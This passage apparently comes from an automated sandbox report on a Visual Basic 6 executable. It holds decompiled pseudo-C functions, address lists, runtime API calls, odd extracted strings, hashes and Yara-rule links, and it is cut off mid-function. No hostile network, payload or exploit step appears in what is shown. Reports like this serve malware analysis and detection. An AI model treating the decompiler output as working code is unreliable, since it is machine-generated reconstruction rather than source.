					_v144 = _t234;
					_t183 =  &_v88;
					L0040157E();
					_v284 = _t183;
					asm("fild dword [ebp-0x118]");
					_v288 = _t234;
					_v152 = _v288;
					_t186 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t208, _t183, _t208, _t182, _t208, _t180, _t208, _t208);
					asm("fclex");
					_v228 = _t186;
					__eflags = _v228;
					if(_v228 >= 0) {
						_t130 =  &_v292;
						 *_t130 = _v292 & 0x00000000;
						__eflags =  *_t130;
					} else {
						_push(0x2c0);
						_push(0x4024b8);
						_push(_a4);
						_push(_v228);
						L00401596();
						_v292 = _t186;
					}
					_push( &_v72);
					_push( &_v64);
					_push( &_v68);
					_push( &_v60);
					_push(4);
					L00401560();
					_push( &_v104);
					_push( &_v88);
					_push(2);
					L00401536();
				}
				asm("wait");
				_push(0x40f013);
				L0040154E();
				_v208 =  &_v48;
				_t162 =  &_v208;
				_push(_t162);
				_push(0);
				L004014E8();
				return _t162;
			}

0x0040ead2
0x0040eadd
0x0040eade
0x0040eaea
0x0040eaf2
0x0040eaf5
0x0040eafc
0x0040eafe
0x0040eb03
0x0040eb06
0x0040eb07
0x0040eb0c
0x0040eb1a
0x0040eb25
0x0040eb2a
0x0040eb1c
0x0040eb1c
0x0040eb1c
0x0040eb30
0x0040eb3f
0x0040eb42
0x0040eb4c
0x0040eb53
0x0040eb5e
0x0040eb63
0x0040eb55
0x0040eb55
0x0040eb55
0x0040eb78
0x0040eb7b
0x0040eb82
0x0040eb8c
0x0040eb95
0x0040eb9c
0x0040eb9d
0x0040eba2
0x0040eba7
0x0040ebad
0x0040ebaf
0x0040ebb0
0x0040ebbe
0x0040ebbe
0x0040ebbe
0x0040ebb2
0x0040ebb2
0x0040ebb2
0x0040ebcd
0x0040ebd7
0x0040ebe3
0x0040ebe5
0x0040ebee
0x0040ebf1
0x0040ebf8
0x0040ec02
0x0040ec0c
0x0040ec16
0x0040ec20
0x0040ec23
0x0040ec2d
0x0040ec2e
0x0040ec2f
0x0040ec30
0x0040ec31
0x0040ec34
0x0040ec41
0x0040ec42
0x0040ec43
0x0040ec44
0x0040ec45
0x0040ec48
0x0040ec55
0x0040ec56
0x0040ec57
0x0040ec58
0x0040ec59
0x0040ec5b
0x0040ec60
0x0040ec63
0x0040ec68
0x0040ec68
0x0040ec75
0x0040ec7b
0x0040ec7d
0x0040ec83
0x0040ec8a
0x0040ecac
0x0040ecac
0x0040ecac
0x0040ec8c
0x0040ec8c
0x0040ec91
0x0040ec96
0x0040ec99
0x0040ec9f
0x0040eca4
0x0040eca4
0x0040ecc2
0x0040ecc8
0x0040ecca
0x0040ecd0
0x0040ecd7
0x0040ecf9
0x0040ecf9
0x0040ecf9
0x0040ecd9
0x0040ecd9
0x0040ecde
0x0040ece3
0x0040ece6
0x0040ecec
0x0040ecf1
0x0040ecf1
0x0040ed07
0x0040ed0b
0x0040ed11
0x0040ed18
0x0040ed35
0x0040ed1a
0x0040ed1a
0x0040ed1f
0x0040ed24
0x0040ed29
0x0040ed29
0x0040ed59
0x0040ed5d
0x0040ed62
0x0040ed7a
0x0040ed80
0x0040ed82
0x0040ed88
0x0040ed8f
0x0040edb4
0x0040edb4
0x0040edb4
0x0040ed91
0x0040ed91
0x0040ed96
0x0040ed9b
0x0040eda1
0x0040eda7
0x0040edac
0x0040edac
0x0040edbb
0x0040edbd
0x0040edbf
0x0040edc5
0x0040edc6
0x0040edcb
0x0040edce
0x0040edd5
0x0040edf2
0x0040edd7
0x0040edd7
0x0040eddc
0x0040ede1
0x0040ede6
0x0040ede6
0x0040ee0c
0x0040ee16
0x0040ee1a
0x0040ee1f
0x0040ee37
0x0040ee3d
0x0040ee3f
0x0040ee45
0x0040ee4c
0x0040ee71
0x0040ee71
0x0040ee71
0x0040ee4e
0x0040ee4e
0x0040ee53
0x0040ee58
0x0040ee5e
0x0040ee64
0x0040ee69
0x0040ee69
0x0040ee78
0x0040ee7a
0x0040ee7c
0x0040ee7f
0x0040ee82
0x0040ee83
0x0040ee88
0x0040ee91
0x0040ee92
0x0040ee9b
0x0040eea1
0x0040eea8
0x0040eeb2
0x0040eeb8
0x0040eebe
0x0040eeaa
0x0040eeaa
0x0040eeaa
0x0040eec3
0x0040eec5
0x0040eec7
0x004013bc
0x004013bc
0x0040eecd
0x0040eeda
0x0040eee4
0x0040eeed
0x0040eef3
0x0040eefa
0x0040eefd
0x0040ef01
0x0040ef06
0x0040ef0c
0x0040ef12
0x0040ef18
0x0040ef1f
0x0040ef22
0x0040ef26
0x0040ef2b
0x0040ef31
0x0040ef37
0x0040ef44
0x0040ef54
0x0040ef5a
0x0040ef5c
0x0040ef62
0x0040ef69
0x0040ef8b
0x0040ef8b
0x0040ef8b
0x0040ef6b
0x0040ef6b
0x0040ef70
0x0040ef75
0x0040ef78
0x0040ef7e
0x0040ef83
0x0040ef83
0x0040ef95
0x0040ef99
0x0040ef9d
0x0040efa1
0x0040efa2
0x0040efa4
0x0040efaf
0x0040efb3
0x0040efb4
0x0040efb6
0x0040efbb
0x0040efbe
0x0040efbf
0x0040eff6
0x0040effe
0x0040f004
0x0040f00a
0x0040f00b
0x0040f00d
0x0040f012

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040EAEA
__vbaAryConstruct2.MSVBVM60(?,00402FE8,00000005,?,?,?,?,004013B6), ref: 0040EB07
__vbaGenerateBoundsError.MSVBVM60 ref: 0040EB25
__vbaGenerateBoundsError.MSVBVM60 ref: 0040EB5E
#682.MSVBVM60(?,0000000A), ref: 0040EB9D
__vbaFpR8.MSVBVM60(?,0000000A), ref: 0040EBA2
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,0000000A), ref: 0040EBD7
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,0000000A), ref: 0040EC23
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,0000000A), ref: 0040EC34
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,0000000A), ref: 0040EC48
__vbaLateMemCall.MSVBVM60(?,FBno18,00000003,?,?,?,?,?,?,?,0000000A), ref: 0040EC63
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,00000114,?,?,?,?,?,?,?,0000000A), ref: 0040EC9F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,00000110,?,?,?,?,?,?,?,0000000A), ref: 0040ECEC
__vbaNew2.MSVBVM60(00401D7C,00410010,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040ED24
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040ED5D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402D74,00000100,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040EDA7
__vbaLateIdCallLd.MSVBVM60(0000000A,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040EDC6
__vbaNew2.MSVBVM60(00401D7C,00410010), ref: 0040EDE1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EE1A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D74,00000160), ref: 0040EE64
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EE83
_adj_fdiv_m64.MSVBVM60 ref: 0040EEBE
__vbaFpI4.MSVBVM60 ref: 0040EEED
__vbaI4Var.MSVBVM60(?,?,00000000), ref: 0040EF01
__vbaI4Var.MSVBVM60(?,?,?,?,00000000), ref: 0040EF26
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,000002C0), ref: 0040EF7E
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0040EFA4
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,00000000), ref: 0040EFB6
__vbaFreeObj.MSVBVM60(0040F013,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040EFF6
__vbaAryDestruct.MSVBVM60(00000000,?,0040F013,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040F00D

Strings

APRJTELAKERINGSVRKSTED, xrefs: 0040EBF8
FBno18, xrefs: 0040EC5B

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$ChkstkFree$CallLate$BoundsErrorGenerateListNew2$#682Construct2Destruct_adj_fdiv_m64
String ID: APRJTELAKERINGSVRKSTED$FBno18
API String ID: 135786774-1727631536
Opcode ID: 49e1bbf64fc483d36bb4971ad8fec086af2e23e4b6e917cee96dc3af8bc61d26
Instruction ID: 9348a659099b94113bc36c67361de0cceaf7387e05033135bb781d34e7d69df0
Opcode Fuzzy Hash: 49e1bbf64fc483d36bb4971ad8fec086af2e23e4b6e917cee96dc3af8bc61d26
Instruction Fuzzy Hash: 14E16870900219EFDB21DF91CD49FEDBBB4BF08304F1044EAE549BA1A1D7B95A949F28

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB29, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040DB29(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v68;
				char _v92;
				char _v100;
				intOrPtr _v108;
				char _v116;
				char _v120;
				void* _v124;
				signed int _v128;
				signed int _v132;
				intOrPtr* _v144;
				signed int _v148;
				char _v152;
				signed int _v156;
				short _t70;
				char* _t75;
				char* _t76;
				char* _t80;
				signed int _t84;
				signed int _t87;
				intOrPtr _t95;
				void* _t103;
				void* _t105;
				intOrPtr _t106;
				intOrPtr* _t107;
				char _t114;

				_t106 = _t105 - 0xc;
				 *[fs:0x0] = _t106;
				L004013B0();
				_v16 = _t106;
				_v12 = 0x401250;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4013b6, _t103);
				_v92 = 0x402f00;
				_v100 = 8;
				L004014D6();
				_push( &_v52);
				_push( &_v68);
				L004014DC();
				_v108 = 0x402f0c;
				_v116 = 0x8008;
				_push( &_v68);
				_t70 =  &_v116;
				_push(_t70);
				L004014E2();
				_v124 = _t70;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L00401536();
				_t107 = _t106 + 0xc;
				if(_v124 != 0) {
					_push(0);
					_push(L"Ubanedes");
					_push( &_v52);
					L004014CA();
					_push(0x10);
					L004013B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v28);
					L004014D0();
					L0040155A();
				}
				_v92 =  &_v32;
				_v100 = 0x6003;
				_t75 =  &_v100;
				_push(_t75);
				L004014C4();
				if(_t75 != 0xffff) {
					if( *0x410010 != 0) {
						_v144 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x401d7c);
						L0040156C();
						_v144 = 0x410010;
					}
					_t95 =  *((intOrPtr*)( *_v144));
					_t80 =  &_v36;
					L00401572();
					_v124 = _t80;
					_t84 =  *((intOrPtr*)( *_v124 + 0x68))(_v124,  &_v120, _t80,  *((intOrPtr*)(_t95 + 0x30c))( *_v144));
					asm("fclex");
					_v128 = _t84;
					if(_v128 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x402d00);
						_push(_v124);
						_push(_v128);
						L00401596();
						_v148 = _t84;
					}
					L00401554();
					_t114 =  *0x401240;
					 *_t107 = _t114;
					asm("fild dword [ebp-0x74]");
					_v152 = _t114;
					_v92 = _v152;
					 *_t107 =  *0x40123c;
					_v100 =  *0x401238;
					_t87 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t95, _t95, _t95, _t95, _t84);
					asm("fclex");
					_v132 = _t87;
					if(_v132 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x4024b8);
						_push(_a4);
						_push(_v132);
						L00401596();
						_v156 = _t87;
					}
					L0040154E();
				}
				asm("wait");
				_push(0x40dd6b);
				L0040154E();
				_t76 =  &_v32;
				_push(_t76);
				_push(0);
				L004014E8();
				return _t76;
			}

0x0040db2c
0x0040db3b
0x0040db47
0x0040db4f
0x0040db52
0x0040db59
0x0040db68
0x0040db6b
0x0040db72
0x0040db7f
0x0040db87
0x0040db8b
0x0040db8c
0x0040db91
0x0040db98
0x0040dba2
0x0040dba3
0x0040dba6
0x0040dba7
0x0040dbac
0x0040dbb3
0x0040dbb7
0x0040dbb8
0x0040dbba
0x0040dbbf
0x0040dbc8
0x0040dbca
0x0040dbcc
0x0040dbd4
0x0040dbd5
0x0040dbda
0x0040dbdd
0x0040dbe7
0x0040dbe8
0x0040dbe9
0x0040dbea
0x0040dbeb
0x0040dbed
0x0040dbf0
0x0040dbf8
0x0040dbf8
0x0040dc00
0x0040dc03
0x0040dc0a
0x0040dc0d
0x0040dc0e
0x0040dc17
0x0040dc24
0x0040dc41
0x0040dc26
0x0040dc26
0x0040dc2b
0x0040dc30
0x0040dc35
0x0040dc35
0x0040dc5b
0x0040dc65
0x0040dc69
0x0040dc6e
0x0040dc7d
0x0040dc80
0x0040dc82
0x0040dc89
0x0040dca5
0x0040dc8b
0x0040dc8b
0x0040dc8d
0x0040dc92
0x0040dc95
0x0040dc98
0x0040dc9d
0x0040dc9d
0x0040dcb2
0x0040dcb8
0x0040dcbf
0x0040dcc2
0x0040dcc5
0x0040dcd2
0x0040dcdc
0x0040dce6
0x0040dcf3
0x0040dcf9
0x0040dcfb
0x0040dd02
0x0040dd21
0x0040dd04
0x0040dd04
0x0040dd09
0x0040dd0e
0x0040dd11
0x0040dd14
0x0040dd19
0x0040dd19
0x0040dd2b
0x0040dd2b
0x0040dd30
0x0040dd31
0x0040dd5a
0x0040dd5f
0x0040dd62
0x0040dd63
0x0040dd65
0x0040dd6a

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040DB47
__vbaVarDup.MSVBVM60 ref: 0040DB7F
#520.MSVBVM60(?,?), ref: 0040DB8C
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 0040DBA7
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0040DBBA
#716.MSVBVM60(?,Ubanedes,00000000,?,?,004013B6), ref: 0040DBD5
__vbaChkstk.MSVBVM60(?,Ubanedes,00000000,?,?,004013B6), ref: 0040DBDD
__vbaLateIdSt.MSVBVM60(?,00000000,?,Ubanedes,00000000,?,?,004013B6), ref: 0040DBF0
__vbaFreeVar.MSVBVM60(?,00000000,?,Ubanedes,00000000,?,?,004013B6), ref: 0040DBF8
#556.MSVBVM60(00006003), ref: 0040DC0E
__vbaNew2.MSVBVM60(00401D7C,00410010,00006003), ref: 0040DC30
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00006003), ref: 0040DC69
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D00,00000068,?,?,?,?,?,?,?,?,?,?,00006003), ref: 0040DC98
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00006003), ref: 0040DCB2
__vbaHresultCheckObj.MSVBVM60(00000000,00401250,004024B8,000002C8,?,?,?,?,00000000), ref: 0040DD14
__vbaFreeObj.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00006003), ref: 0040DD2B
__vbaFreeObj.MSVBVM60(0040DD6B,00006003), ref: 0040DD5A
__vbaAryDestruct.MSVBVM60(00000000,?,0040DD6B,00006003), ref: 0040DD65

Strings

rr, xrefs: 0040DB6B
Ubanedes, xrefs: 0040DBCC

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$#520#556#716DestructLateListNew2
String ID: rr$Ubanedes
API String ID: 2802702702-2666405563
Opcode ID: 88fc47c1636c4eb743a524f407426b51723b1cc2141f8ec9dfab166f16348226
Instruction ID: d14b1b0f05860fffa026f2003542ee5a54b36431fedf364d534ee0f17d07bdf1
Opcode Fuzzy Hash: 88fc47c1636c4eb743a524f407426b51723b1cc2141f8ec9dfab166f16348226
Instruction Fuzzy Hash: BC512571900218AFDB10EFA1CC89FADBBB8BF08304F10456AF545BB1A1DB789949DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B6, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040E1B6(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				long long _v32;
				void* _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _t36;
				signed int _t40;
				signed int _t44;
				intOrPtr _t64;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t64;
				_t36 = 0x20;
				L004013B0();
				_v12 = _t64;
				_v8 = 0x4012a0;
				_push(1);
				L004014A6();
				L00401548();
				_push(_t36);
				_push(0x402f30);
				L004014AC();
				asm("sbb eax, eax");
				_v40 =  ~( ~( ~_t36));
				L00401512();
				_t40 = _v40;
				if(_t40 != 0) {
					L00401554();
					_t40 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t40);
					asm("fclex");
					_v40 = _t40;
					if(_v40 >= 0) {
						_v48 = _v48 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x4024b8);
						_push(_a4);
						_push(_v40);
						L00401596();
						_v48 = _t40;
					}
				}
				L00401506();
				_push(2);
				_push(_v24);
				L004014A0();
				L00401548();
				_push(_t40);
				_push(0x402f44);
				L004014AC();
				asm("sbb eax, eax");
				_v40 =  ~( ~( ~_t40));
				L00401512();
				_t44 = _v40;
				if(_t44 != 0) {
					_t44 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v40 = _t44;
					if(_v40 >= 0) {
						_v52 = _v52 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x4024e8);
						_push(_a4);
						_push(_v40);
						L00401596();
						_v52 = _t44;
					}
				}
				_v32 =  *0x401290;
				asm("wait");
				_push(0x40e2f8);
				L00401512();
				return _t44;
			}

0x0040e1bb
0x0040e1c6
0x0040e1c7
0x0040e1d0
0x0040e1d1
0x0040e1d9
0x0040e1dc
0x0040e1e3
0x0040e1e5
0x0040e1ef
0x0040e1f4
0x0040e1f5
0x0040e1fa
0x0040e201
0x0040e207
0x0040e20e
0x0040e213
0x0040e219
0x0040e221
0x0040e22f
0x0040e232
0x0040e234
0x0040e23b
0x0040e254
0x0040e23d
0x0040e23d
0x0040e23f
0x0040e244
0x0040e247
0x0040e24a
0x0040e24f
0x0040e24f
0x0040e23b
0x0040e260
0x0040e265
0x0040e267
0x0040e26a
0x0040e274
0x0040e279
0x0040e27a
0x0040e27f
0x0040e286
0x0040e28c
0x0040e293
0x0040e298
0x0040e29e
0x0040e2a8
0x0040e2ae
0x0040e2b5
0x0040e2d1
0x0040e2b7
0x0040e2b7
0x0040e2bc
0x0040e2c1
0x0040e2c4
0x0040e2c7
0x0040e2cc
0x0040e2cc
0x0040e2b5
0x0040e2db
0x0040e2de
0x0040e2df
0x0040e2f2
0x0040e2f7

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040E1D1
#525.MSVBVM60(00000001,?,?,?,?,004013B6), ref: 0040E1E5
__vbaStrMove.MSVBVM60(00000001,?,?,?,?,004013B6), ref: 0040E1EF
__vbaStrCmp.MSVBVM60(00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E1FA
__vbaFreeStr.MSVBVM60(00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E20E
__vbaFpI4.MSVBVM60(00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E221
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,00000064,?,?,?,?,?,?,004013B6), ref: 0040E24A
__vbaStrCopy.MSVBVM60(00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E260
#514.MSVBVM60(?,00000002,00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E26A
__vbaStrMove.MSVBVM60(?,00000002,00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E274
__vbaStrCmp.MSVBVM60(00402F44,00000000,?,00000002,00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E27F
__vbaFreeStr.MSVBVM60(00402F44,00000000,?,00000002,00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E293
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024E8,00000710,?,?,?,?,?,?,004013B6), ref: 0040E2C7
__vbaFreeStr.MSVBVM60(0040E2F8,00402F44,00000000,?,00000002,00402F30,00000000,00000001,?,?,?,?,004013B6), ref: 0040E2F2

Strings

var, xrefs: 0040E258

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#514#525ChkstkCopy
String ID: var
API String ID: 70873507-1842382598
Opcode ID: 7173a5ebdfaf7636165ccd8e285a5f319c6fc2c7ad2bf945a86af87b7e69b101
Instruction ID: f07d175e998b3a5919e57d2bec32f68d011874c54bdf597d43f9c688c44252a2
Opcode Fuzzy Hash: 7173a5ebdfaf7636165ccd8e285a5f319c6fc2c7ad2bf945a86af87b7e69b101
Instruction Fuzzy Hash: 3E314C30950209ABDF00EFA5CD46BEE77B8AF48744F10457AF402BA1F1DB799D548B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F564, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040F564(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _t68;
				signed int _t73;
				char* _t78;
				signed int _t82;
				intOrPtr _t99;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t99;
				_push(0x4c);
				L004013B0();
				_v12 = _t99;
				_v8 = 0x401390;
				if( *0x410438 != 0) {
					_v80 = 0x410438;
				} else {
					_push(0x410438);
					_push(0x402d40);
					L0040156C();
					_v80 = 0x410438;
				}
				_v56 =  *_v80;
				_t68 =  *((intOrPtr*)( *_v56 + 0x14))(_v56,  &_v36);
				asm("fclex");
				_v60 = _t68;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x402d30);
					_push(_v56);
					_push(_v60);
					L00401596();
					_v84 = _t68;
				}
				_v64 = _v36;
				_t73 =  *((intOrPtr*)( *_v64 + 0xf8))(_v64,  &_v32);
				asm("fclex");
				_v68 = _t73;
				if(_v68 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403014);
					_push(_v64);
					_push(_v68);
					L00401596();
					_v88 = _t73;
				}
				_v76 = _v32;
				_v32 = _v32 & 0x00000000;
				L00401548();
				L0040154E();
				if( *0x410010 != 0) {
					_v92 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x401d7c);
					L0040156C();
					_v92 = 0x410010;
				}
				_t78 =  &_v36;
				L00401572();
				_v56 = _t78;
				_v44 = 1;
				_v52 = 2;
				L004013B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t82 =  *((intOrPtr*)( *_v56 + 0x1b8))(_v56, 0x10, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x300))( *_v92));
				asm("fclex");
				_v60 = _t82;
				if(_v60 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x402d74);
					_push(_v56);
					_push(_v60);
					L00401596();
					_v96 = _t82;
				}
				L0040154E();
				_v24 = 0x5566;
				_push(0x40f721);
				L00401512();
				return _t82;
			}

0x0040f569
0x0040f574
0x0040f575
0x0040f57c
0x0040f57f
0x0040f587
0x0040f58a
0x0040f598
0x0040f5b2
0x0040f59a
0x0040f59a
0x0040f59f
0x0040f5a4
0x0040f5a9
0x0040f5a9
0x0040f5be
0x0040f5cd
0x0040f5d0
0x0040f5d2
0x0040f5d9
0x0040f5f2
0x0040f5db
0x0040f5db
0x0040f5dd
0x0040f5e2
0x0040f5e5
0x0040f5e8
0x0040f5ed
0x0040f5ed
0x0040f5f9
0x0040f608
0x0040f60e
0x0040f610
0x0040f617
0x0040f633
0x0040f619
0x0040f619
0x0040f61e
0x0040f623
0x0040f626
0x0040f629
0x0040f62e
0x0040f62e
0x0040f63a
0x0040f63d
0x0040f647
0x0040f64f
0x0040f65b
0x0040f675
0x0040f65d
0x0040f65d
0x0040f662
0x0040f667
0x0040f66c
0x0040f66c
0x0040f690
0x0040f694
0x0040f699
0x0040f69c
0x0040f6a3
0x0040f6ad
0x0040f6b7
0x0040f6b8
0x0040f6b9
0x0040f6ba
0x0040f6c3
0x0040f6c9
0x0040f6cb
0x0040f6d2
0x0040f6ee
0x0040f6d4
0x0040f6d4
0x0040f6d9
0x0040f6de
0x0040f6e1
0x0040f6e4
0x0040f6e9
0x0040f6e9
0x0040f6f5
0x0040f6fa
0x0040f700
0x0040f71b
0x0040f720

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040F57F
__vbaNew2.MSVBVM60(00402D40,00410438,?,?,?,?,004013B6), ref: 0040F5A4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D30,00000014), ref: 0040F5E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000F8), ref: 0040F629
__vbaStrMove.MSVBVM60 ref: 0040F647
__vbaFreeObj.MSVBVM60 ref: 0040F64F
__vbaNew2.MSVBVM60(00401D7C,00410010), ref: 0040F667
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F694
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F6AD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D74,000001B8), ref: 0040F6E4
__vbaFreeObj.MSVBVM60 ref: 0040F6F5
__vbaFreeStr.MSVBVM60(0040F721), ref: 0040F71B

Strings

fU, xrefs: 0040F6FA

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$ChkstkNew2$Move
String ID: fU
API String ID: 2583732202-1769962405
Opcode ID: 88ecd4739859a9d11af5857afcfd435e533197b5d9abf54e33607bcfd4b80dae
Instruction ID: cf4da745c2802c9a22ef333ad8d639f4fbcc8bbf8397dedf68cdb4f79a498df3
Opcode Fuzzy Hash: 88ecd4739859a9d11af5857afcfd435e533197b5d9abf54e33607bcfd4b80dae
Instruction Fuzzy Hash: F751E270900218EFDB10DF91D885BDDBBB5BF08708F20443AF102BB2A1D7B9598ADB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DFAA, Relevance: 21.1, APIs: 14, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E0040DFAA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr* _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _t63;
				signed int _t67;
				signed int _t72;
				signed int _t76;
				char* _t77;
				char* _t79;
				signed int _t82;
				intOrPtr _t99;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t99;
				_push(0x4c);
				L004013B0();
				_v12 = _t99;
				_v8 = 0x401280;
				if( *0x410010 != 0) {
					_v80 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x401d7c);
					L0040156C();
					_v80 = 0x410010;
				}
				_t63 =  &_v28;
				L00401572();
				_v68 = _t63;
				_v56 = 0x80020004;
				_v64 = 0xa;
				L004013B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t67 =  *((intOrPtr*)( *_v68 + 0x220))(_v68, 0x10, _t63,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x304))( *_v80));
				asm("fclex");
				_v72 = _t67;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x220);
					_push(0x402d10);
					_push(_v68);
					_push(_v72);
					L00401596();
					_v84 = _t67;
				}
